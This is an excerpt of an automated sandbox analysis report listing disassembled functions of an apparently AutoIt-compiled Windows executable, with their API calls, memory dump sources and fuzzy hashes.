                                                                                                                                                                            • Opcode ID: 12e9cceb3159c758936de1d7df2722ca7db1c3facea5cb0a32d681515e88fbd1
                                                                                                                                                                            • Instruction ID: 6eecc4ce411c15c4a1baa9c0df38765270b12eed649abcfb79c3f721fc6c97e2
                                                                                                                                                                            • Opcode Fuzzy Hash: 12e9cceb3159c758936de1d7df2722ca7db1c3facea5cb0a32d681515e88fbd1
                                                                                                                                                                            • Instruction Fuzzy Hash: 6521C831B00244ABEB10BB768C86EEE7BA9EF49714F04403AFB04DB251D675CD4587A6
                                                                                                                                                                            Function 004612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0046134D
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0046135C
                                                                                                                                                                            • BeginPath.GDI32(?), ref: 00461373
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0046139C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3225163088-0
                                                                                                                                                                            • Opcode ID: 1a856b09c53ce7a21b1d6a0c894e074defbe5eb910279bb860b78de06070014a
                                                                                                                                                                            • Instruction ID: 191db1dd97be0933290418f25c4662cba68d3e86c046df69c79503f3cac2e121
                                                                                                                                                                            • Opcode Fuzzy Hash: 1a856b09c53ce7a21b1d6a0c894e074defbe5eb910279bb860b78de06070014a
                                                                                                                                                                            • Instruction Fuzzy Hash: 90217470800304EFEB219F25DD4476A7BF8FF11311F184227F811962B1E375999AEB9A
                                                                                                                                                                            Function 004BC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                            • Opcode ID: 30da597d7b2bf8d7dc9694d0a965782bf2eee304027fa5af695bbecf86c8dbf4
                                                                                                                                                                            • Instruction ID: a5c94c4987d5f39d2df10e97fc5a8ba7787ae751cb4ad86293c15829baf9111f
                                                                                                                                                                            • Opcode Fuzzy Hash: 30da597d7b2bf8d7dc9694d0a965782bf2eee304027fa5af695bbecf86c8dbf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6801967160510A7BE204B6295DC2FFF735C9F11398B144417FE04B6253FA5C9E1286BD
                                                                                                                                                                            Function 004C4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004C4D5C
                                                                                                                                                                            • __beginthreadex.LIBCMT ref: 004C4D7A
                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 004C4D8F
                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004C4DA5
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004C4DAC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3824534824-0
                                                                                                                                                                            • Opcode ID: a6a7bded2a2b3272e5279a3bfb078a90a01dd45246e232c70eb8763a1a7cc27a
                                                                                                                                                                            • Instruction ID: a012d2972ede270c4be1547c9baa75e878459c4d1a0fb8e897bcc5d1966540c2
                                                                                                                                                                            • Opcode Fuzzy Hash: a6a7bded2a2b3272e5279a3bfb078a90a01dd45246e232c70eb8763a1a7cc27a
                                                                                                                                                                            • Instruction Fuzzy Hash: D511487A904248FFC710ABA89C44F9F7FACEB85320F14426AF815D3351C6748D0887A0
                                                                                                                                                                            Function 004B874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B8766
                                                                                                                                                                            • GetLastError.KERNEL32(?,004B822A,?,?,?), ref: 004B8770
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,004B822A,?,?,?), ref: 004B877F
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,004B822A,?,?,?), ref: 004B8786
                                                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B879D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                                                            • Opcode ID: 0d0344e01c1747a812ea138b94045f826f1e99e5cff206ee6b463aeb398ed8a4
                                                                                                                                                                            • Instruction ID: bfeef8a79ef5b9fef454e6ccb675f672090765816f8a6e24c04960404afa4d54
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d0344e01c1747a812ea138b94045f826f1e99e5cff206ee6b463aeb398ed8a4
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B014B75200248EFDB204FB6DC88DABBBACEF8A355720043AF849C6260DA318C05CA74
                                                                                                                                                                            Function 004C54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C5502
                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004C5510
                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C5518
                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004C5522
                                                                                                                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C555E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                            • Opcode ID: fdb6b472ae0d6d6383047bd4180c675fc6ee6c0c33c1d2f2b68a88557bff4ae9
                                                                                                                                                                            • Instruction ID: 34e454d2a920b7a4976196ccaa5e69d375d5a484baf47d3e15c8b7ff15957ed3
                                                                                                                                                                            • Opcode Fuzzy Hash: fdb6b472ae0d6d6383047bd4180c675fc6ee6c0c33c1d2f2b68a88557bff4ae9
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C015235D0091DEBCF00DFE5E888AEDBB78FB09701F44006AD501B6245DB346994C7A9
                                                                                                                                                                            Function 004B7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?,?,004B799D), ref: 004B766F
                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B768A
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B7698
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?), ref: 004B76A8
                                                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B76B4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                                                            • Opcode ID: f5cc9ca8601f4d7bc67b8fb5942d3ee31317981d888d80436ddd138aaa16552e
                                                                                                                                                                            • Instruction ID: d6d6fff3dcb46f38122be31d3c2d8bdf446edefb4b1e966356b0df469ef4664b
                                                                                                                                                                            • Opcode Fuzzy Hash: f5cc9ca8601f4d7bc67b8fb5942d3ee31317981d888d80436ddd138aaa16552e
                                                                                                                                                                            • Instruction Fuzzy Hash: BF018472601604BBDB105F58DC84BEA7BADEB84761F144039FD04D6312E735DE459BB4
                                                                                                                                                                            Function 004B85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B8608
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B8612
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B8621
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B8628
                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B863E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                            • Opcode ID: dba756f4cc5bf7414aa7526cd404043e8522cfa1d6abcb1aadd42dd64c523cea
                                                                                                                                                                            • Instruction ID: 97a3fd6b977c56c785c12db438fa5967717ebdefb170e83558ce5ba7b8d05f01
                                                                                                                                                                            • Opcode Fuzzy Hash: dba756f4cc5bf7414aa7526cd404043e8522cfa1d6abcb1aadd42dd64c523cea
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF06231201244AFEB100FA9DCCDEAB3BACEF8A754B04443AF945DA291CB759C45DA74
                                                                                                                                                                            Function 004B8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004B8669
                                                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004B8673
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8682
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004B8689
                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004B869F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                                                            • Opcode ID: d27e6e933a04353507bfa27b681827b404ab90a28f145a121b859289b1f6720d
                                                                                                                                                                            • Instruction ID: 002d33b02a21959e28d578b9c6cb6ed7dd422bd22ab922daf47c73541a22c166
                                                                                                                                                                            • Opcode Fuzzy Hash: d27e6e933a04353507bfa27b681827b404ab90a28f145a121b859289b1f6720d
                                                                                                                                                                            • Instruction Fuzzy Hash: 90F0C270200344AFEB111FA4ECC8EA73BACEF8A754B10043AF905CA2A1DB70DD15DA74
                                                                                                                                                                            Function 004BC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004BC6BA
                                                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 004BC6D1
                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 004BC6E9
                                                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 004BC705
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 004BC71F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                            • Opcode ID: f1136287736d35f7edbab2490e42f369353ab90eb1e8c12b8c86eaa697287523
                                                                                                                                                                            • Instruction ID: 6650ebbdc84d159519f484c1eed073e198cd576882c4e30db1a963bd10506655
                                                                                                                                                                            • Opcode Fuzzy Hash: f1136287736d35f7edbab2490e42f369353ab90eb1e8c12b8c86eaa697287523
                                                                                                                                                                            • Instruction Fuzzy Hash: B0016230500704ABEB215B60DDCEF9677B8FF00705F00066AF646A55E1DBF4A9598F99
                                                                                                                                                                            Function 004613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • EndPath.GDI32(?), ref: 004613BF
                                                                                                                                                                            • StrokeAndFillPath.GDI32(?,?,0049BAD8,00000000,?), ref: 004613DB
                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 004613EE
                                                                                                                                                                            • DeleteObject.GDI32 ref: 00461401
                                                                                                                                                                            • StrokePath.GDI32(?), ref: 0046141C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2625713937-0
                                                                                                                                                                            • Opcode ID: 1bfbce77f60dd86b4539d836ec562135f1edd76e0e07a17bc54f0dc701577e2d
                                                                                                                                                                            • Instruction ID: 2f9285e703158a74b4a497f1ee71d35aa9a39065a0e42f7c5c96a4a6b87abba8
                                                                                                                                                                            • Opcode Fuzzy Hash: 1bfbce77f60dd86b4539d836ec562135f1edd76e0e07a17bc54f0dc701577e2d
                                                                                                                                                                            • Instruction Fuzzy Hash: E3F0EC30004348EBDB215F26EC8D7693FE4AB12326F08C236E829491F2D735499AEF59
                                                                                                                                                                            Function 00472E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
                                                                                                                                                                              • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 00467BB1: _memmove.LIBCMT ref: 00467C0B
                                                                                                                                                                            • __swprintf.LIBCMT ref: 0047302D
                                                                                                                                                                            Strings
                                                                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00472EC6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                            • API String ID: 1943609520-557222456
                                                                                                                                                                            • Opcode ID: 8cb126a9fbc59620af581efdf2f6fd2bd3bbf676bbde0a013ecb2e81cc3b11e6
                                                                                                                                                                            • Instruction ID: 2627281165f30693618b66fd0ee1849a3f3a9e5f8f9c79019ca16503bfc17b4b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8cb126a9fbc59620af581efdf2f6fd2bd3bbf676bbde0a013ecb2e81cc3b11e6
                                                                                                                                                                            • Instruction Fuzzy Hash: D491AF711083419FC718EF25D885CAFB7A8EF95708F04491FF4859B2A1EA78EE44CB5A
                                                                                                                                                                            Function 004BB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 004BB981
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContainedObject
                                                                                                                                                                            • String ID: AutoIt3GUI$Container$%O
                                                                                                                                                                            • API String ID: 3565006973-335713367
                                                                                                                                                                            • Opcode ID: 65338de051067730d51e77f87aa8f90794c1ee36b4945818aad6bb01ba7176de
                                                                                                                                                                            • Instruction ID: ad76182ad7b40cb0673536563351b4304104c40d17dbedc3b944ed07a3922dfa
                                                                                                                                                                            • Opcode Fuzzy Hash: 65338de051067730d51e77f87aa8f90794c1ee36b4945818aad6bb01ba7176de
                                                                                                                                                                            • Instruction Fuzzy Hash: 17914D706006019FDB64DF24C884AAABBF9FF49710F14856EF945CB391DBB4E841CBA4
                                                                                                                                                                            Function 0048524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 004852DD
                                                                                                                                                                              • Part of subcall function 00490340: __87except.LIBCMT ref: 0049037B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorHandling__87except__start
                                                                                                                                                                            • String ID: pow
                                                                                                                                                                            • API String ID: 2905807303-2276729525
